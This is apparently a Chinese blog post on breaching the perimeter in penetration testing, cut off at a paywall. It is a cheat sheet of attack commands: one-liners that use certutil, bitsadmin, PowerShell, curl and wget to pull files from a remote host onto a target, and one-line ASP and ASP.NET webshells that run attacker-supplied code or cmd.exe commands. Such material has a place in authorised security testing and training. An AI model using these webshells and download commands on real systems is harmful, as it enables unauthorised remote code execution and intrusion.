渗透测试里的边界突破

网盾网络安全服务

于 2024-07-04 10:46:29 发布

阅读量400

点赞数 10

文章标签：网络安全渗透测试

本文链接：https://blog.youkuaiyun.com/qq_69775412/article/details/140173427

版权

Http

php -S 0.0.0.0:8000
python2 -m SimpleHTTPServer
python3 -m http.server 8000

Shell

Curl

curl http://example.com/File -o File

Shell

Wget

wget http://example.com/File -O File

Shell

Certutil

echo Base64 > Temp && certutil -f -decode Temp File
certutil -urlcache -split -f http://example.com/File File
certutil -urlcache -split -f http://example.com/File delete

Shell

Bitsadmin

bitsadmin /transfer job http://example.com/File C:\Users\Public\File

Shell

PowerShell

powershell (New-Object System.Net.WebClient).DownloadFile('http://example.com/File','File')
powershell [IO.File]::WriteAllBytes('C:\Users\Public\File',[Convert]::FromBase64String('Base64'))

PowerShell

WebShell

ASP

代码执行

<% Eval request("code") %>
<% Execute request("code") %>
<% ExecuteGlobal(request("code")) %>

ASPNet

命令执行

<%= Server.CreateObject("WScript.Shell").exec("cmd.exe /c "&request("cmd&

最低0.47元/天解锁文章

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。

余额充值